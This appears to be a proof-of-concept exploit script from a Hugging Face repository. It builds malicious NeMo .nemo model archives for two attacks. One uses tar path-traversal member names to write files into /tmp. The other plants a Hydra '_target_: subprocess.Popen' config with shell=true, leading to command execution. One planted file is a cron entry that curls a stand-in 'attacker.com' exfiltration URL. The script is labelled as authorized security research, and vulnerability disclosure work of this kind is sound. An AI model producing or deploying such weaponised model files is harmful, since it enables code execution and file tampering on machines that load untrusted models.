exploits / nemo /craft_malicious_nemo.py
Zeiyre's picture
Upload nemo/craft_malicious_nemo.py with huggingface_hub
20db0ae verified
"""
PoC: NeMo Path Traversal + Hydra _target_ Injection
=====================================================
Crafts malicious .nemo files demonstrating two vulnerabilities:
1. Path Traversal: tar.extract() in model_utils.py without _safe_extract()
2. Hydra Injection: _target_ field in config instantiates arbitrary classes
Usage:
python craft_malicious_nemo.py # Generate both PoCs
python craft_malicious_nemo.py --type traversal # Path traversal only
python craft_malicious_nemo.py --type hydra # Hydra injection only
python craft_malicious_nemo.py --verify # Show archive contents
This is for authorized security research only.
"""
import tarfile
import io
import os
import argparse
def craft_path_traversal_nemo(output_path="path_traversal.nemo"):
    """
    Write a test .nemo archive whose member names contain ``..`` components.

    The archive is an uncompressed tar holding three members, in this order:
    a plain ``model_config.yaml`` and two entries whose names start with
    ``../../../../tmp/``. After writing, the archive is re-opened read-only
    and a summary is printed; nothing is extracted by this function.

    The premise of the PoC (per its author) is that NeMo's
    ``model_utils.load_config()`` / ``save_artifacts()`` call ``tar.extract()``
    without the ``_safe_extract()`` guard used in ``save_restore_connector.py``.
    That behaviour lives outside this file and is not verified here.

    For authorized security research only.

    Args:
        output_path: Destination path of the generated archive.

    Returns:
        ``output_path``, unchanged.
    """
    # Ordinary config entry; the author notes it is needed for detect_prefix().
    benign_config = b"""model:
name: poc_path_traversal
target: nemo_test
class_path: nemo.collections.asr.models.EncDecCTCModel
"""
    # Harmless marker text used to show that a write landed outside the
    # extraction directory.
    marker_blob = b"PATH_TRAVERSAL_SUCCESSFUL - written outside extraction dir\n"
    # Second marker, shaped like a cron entry, to illustrate impact.
    cron_blob = b"# Malicious cron job\n* * * * * curl http://attacker.com/exfil\n"

    # (member name, content) pairs, written in exactly this order.
    planned_members = (
        ("model_config.yaml", benign_config),
        ("../../../../tmp/nemo_poc_escaped.txt", marker_blob),
        ("../../../../tmp/nemo_poc_cron", cron_blob),
    )

    with tarfile.open(output_path, "w:") as archive:
        for entry_name, blob in planned_members:
            header = tarfile.TarInfo(name=entry_name)
            header.size = len(blob)
            archive.addfile(header, io.BytesIO(blob))

    archive_bytes = os.path.getsize(output_path)
    print(f"[+] Path traversal .nemo written to: {output_path}")
    print(f" Size: {archive_bytes} bytes")
    print()
    print(" Tar contents:")
    with tarfile.open(output_path, "r:") as archive:
        for entry in archive.getmembers():
            # Flag every entry whose name contains a parent-directory hop.
            marker = ""
            if ".." in entry.name:
                marker = " <-- PATH TRAVERSAL"
            print(f" {entry.name}{marker}")
    print()
    for note in (
        "[!] When loaded by nemo.utils.model_utils.load_config():",
        " tar.extract() has NO path validation (_safe_extract not used)",
        " Files are written outside the temp extraction directory",
    ):
        print(note)
    return output_path
def craft_hydra_injection_nemo(output_path="hydra_injection.nemo"):
    """
    Write a test .nemo archive whose config carries a ``_target_`` key.

    The archive is an uncompressed tar holding ``model_config.yaml`` (with an
    ``optim`` section naming ``subprocess.Popen`` as ``_target_`` and an
    ``echo`` marker command as its argument) followed by a 64-byte all-zero
    ``model_weights.ckpt`` placeholder. A summary is printed afterwards.

    The premise of the PoC (per its author) is that NeMo's
    ``setup_optimization()`` passes this section to
    ``hydra.utils.instantiate()``. That behaviour lives outside this file and
    is not verified here.

    For authorized security research only.

    Args:
        output_path: Destination path of the generated archive.

    Returns:
        ``output_path``, unchanged.
    """
    # Config bytes are stored verbatim as the first archive member.
    injected_config = b"""model:
name: poc_hydra_injection
target: nemo_test
optim:
_target_: subprocess.Popen
args:
- "echo HYDRA_TARGET_INJECTION_SUCCESSFUL"
shell: true
sched:
name: CosineAnnealing
warmup_steps: 100
"""
    # Zero-filled stand-in so the archive resembles a real .nemo file.
    placeholder_weights = bytes(64)

    with tarfile.open(output_path, "w:") as archive:
        for entry_name, blob in (
            ("model_config.yaml", injected_config),
            ("model_weights.ckpt", placeholder_weights),
        ):
            header = tarfile.TarInfo(name=entry_name)
            header.size = len(blob)
            archive.addfile(header, io.BytesIO(blob))

    print(f"[+] Hydra injection .nemo written to: {output_path}")
    print(f" Size: {os.path.getsize(output_path)} bytes")
    print()
    print(" Tar contents:")
    with tarfile.open(output_path, "r:") as archive:
        for entry in archive.getmembers():
            print(f" {entry.name}")

    # Fixed explanatory report; an empty string yields a blank line,
    # exactly like a bare print().
    report = (
        "",
        " Malicious config excerpt:",
        " optim:",
        " _target_: subprocess.Popen <-- ARBITRARY CLASS INSTANTIATION",
        ' args: ["echo HYDRA_TARGET_INJECTION_SUCCESSFUL"]',
        " shell: true",
        "",
        "[!] When loaded by NeMo and setup_optimization() is called:",
        " hydra.utils.instantiate({_target_: 'subprocess.Popen', ...})",
        " -> Instantiates subprocess.Popen with attacker args -> RCE",
    )
    for text in report:
        print(text)
    return output_path
def main():
    """
    Command-line entry point: generate the requested PoC archive(s).

    Options:
        --type {traversal,hydra,both}  Which archive(s) to generate
                                       (default: both).
        --verify                       After generation, list each archive's
                                       members and preview the first lines of
                                       its model_config.yaml.
        --output-dir DIR               Directory the archives are written to
                                       (default: current directory). It is
                                       created if it does not exist.

    Archives are only written and read back in memory here; nothing is
    extracted to disk.
    """
    parser = argparse.ArgumentParser(description="NeMo PoC generator")
    parser.add_argument("--type", choices=["traversal", "hydra", "both"],
                        default="both", help="Which PoC to generate")
    parser.add_argument("--verify", action="store_true",
                        help="Show archive contents after generation")
    parser.add_argument("--output-dir", default=".", help="Output directory")
    args = parser.parse_args()

    # tarfile.open() does not create missing parent directories, so a fresh
    # --output-dir would otherwise fail with FileNotFoundError. An empty
    # string still means "current directory" and must not reach makedirs().
    if args.output_dir:
        os.makedirs(args.output_dir, exist_ok=True)

    paths = []
    if args.type in ("traversal", "both"):
        path = craft_path_traversal_nemo(
            os.path.join(args.output_dir, "path_traversal.nemo"))
        paths.append(path)
        print()
    if args.type in ("hydra", "both"):
        path = craft_hydra_injection_nemo(
            os.path.join(args.output_dir, "hydra_injection.nemo"))
        paths.append(path)
        print()

    if args.verify:
        for path in paths:
            print(f"=== Verifying {path} ===")
            with tarfile.open(path, "r:") as tar:
                for member in tar.getmembers():
                    print(f" {member.name} ({member.size} bytes)")
                    if member.name == "model_config.yaml":
                        # extractfile() reads the member in memory; it does
                        # not write anything to the filesystem.
                        f = tar.extractfile(member)
                        if f:
                            print(" Config preview:")
                            for line in f.read().decode().split("\n")[:10]:
                                print(f" {line}")
            print()


if __name__ == "__main__":
    main()